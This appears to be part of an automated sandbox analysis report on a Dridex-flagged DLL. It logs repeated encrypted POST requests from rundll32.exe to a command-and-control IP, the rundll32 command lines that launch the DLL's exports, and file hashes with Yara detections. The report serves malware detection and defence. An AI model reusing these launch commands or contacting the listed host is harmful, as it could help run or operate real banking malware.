                                                                                                              2021-10-28 02:51:52 UTC434OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:52 UTC439INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:52 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              88192.168.2.450209192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:56 UTC439OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:56 UTC439OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:57 UTC449INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:57 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              89192.168.2.450210192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:56 UTC444OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:56 UTC444OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:57 UTC449INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:57 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              9192.168.2.449817192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:18 UTC44OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:18 UTC45OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:19 UTC49INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:19 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              90192.168.2.450217192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:52:00 UTC449OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:52:00 UTC449OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:52:01 UTC458INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:52:01 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              91192.168.2.450218192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:52:00 UTC454OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:52:00 UTC454OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:52:01 UTC459INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:52:01 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:04:47:59
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll'
                                                                                                              Imagebase:0xa60000
                                                                                                              File size:893440 bytes
                                                                                                              MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1194485552.000000006E3B1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.784553860.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:04:47:59
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                                                                                                              Imagebase:0x11d0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:04:48:00
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Bluewing
                                                                                                              Imagebase:0x10c0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.753234936.0000000004A80000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:04:48:00
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                                                                                                              Imagebase:0x10c0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.1197217588.000000006E3B1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.752228800.0000000004950000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:04:48:04
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Earth
                                                                                                              Imagebase:0x10c0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.779089612.0000000004C10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:04:48:13
                                                                                                              Start date:28/10/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Masterjust
                                                                                                              Imagebase:0x10c0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.785852075.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >